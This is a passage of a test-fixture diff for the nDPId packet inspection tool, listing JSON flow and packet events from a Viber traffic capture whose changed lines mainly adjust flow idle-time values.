ZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0
RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVI="} 00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":120000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":1480,"flow_avg_l4_payload_len":1480,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.196204} 
02402{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1527155685757,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1527155685757,"pkt":"MAdNo1+nAA6OMNv9CABFAAXcOTwAAEABunTAqAAPwKgAEQAA5UOrGAABMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNU
VVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVI="} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1527155639240,"flow_last_seen":1527155640252,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6393,"flow_avg_l4_payload_len":290,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1527155640085,"flow_last_seen":1527155641008,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6145,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1527155639240,"flow_last_seen":1527155640252,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6393,"flow_avg_l4_payload_len":290,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1527155640085,"flow_last_seen":1527155641008,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6145,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1527155644240,"flow_last_seen":1527155644244,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.106","src_port":41993,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1527155644240,"flow_last_seen":1527155644244,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.106","src_port":41993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1527155670640,"flow_last_seen":1527155677861,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":5405,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155670640,"flow_last_seen":1527155670672,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1527155641697,"flow_last_seen":1527155647390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9565,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1527155641697,"flow_last_seen":1527155647390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9565,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}} 00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":120000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":2960,"flow_avg_l4_payload_len":1480,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1527155648513,"flow_last_seen":1527155648748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6479,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1527155638428,"flow_last_seen":1527155685200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":591,"flow_tot_l4_payload_len":5517,"flow_avg_l4_payload_len":95,"midstream":1,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":89,"flow_first_seen":1527155641845,"flow_last_seen":1527155647484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":58768,"flow_avg_l4_payload_len":660,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1527155648513,"flow_last_seen":1527155648748,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6479,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1527155638428,"flow_last_seen":1527155685200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":591,"flow_tot_l4_payload_len":5517,"flow_avg_l4_payload_len":95,"midstream":1,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":89,"flow_first_seen":1527155641845,"flow_last_seen":1527155647484,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":58768,"flow_avg_l4_payload_len":660,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}} 00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155647500,"flow_last_seen":1527155647500,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip6","src_ip":"fe80::3207:4dff:fea3:5fa7","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155646968,"flow_last_seen":1527155666982,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155639005,"flow_last_seen":1527155639008,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":261,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"}} 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155646819,"flow_last_seen":1527155646840,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155641574,"flow_last_seen":1527155641691,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"}} 
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155638474,"flow_last_seen":1527155638476,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155670632,"flow_last_seen":1527155677899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155670632,"flow_last_seen":1527155677899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1527155671066,"flow_last_seen":1527155672061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7577,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155670632,"flow_last_seen":1527155677899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155670632,"flow_last_seen":1527155677899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1527155671066,"flow_last_seen":1527155672061,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7577,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155685529,"flow_last_seen":1527155685530,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1527155679411,"flow_last_seen":1527155685088,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":4410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155679411,"flow_last_seen":1527155679443,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1527155646850,"flow_last_seen":1527155680789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":972,"flow_tot_l4_payload_len":6977,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1527155646850,"flow_last_seen":1527155680789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":972,"flow_tot_l4_payload_len":6977,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
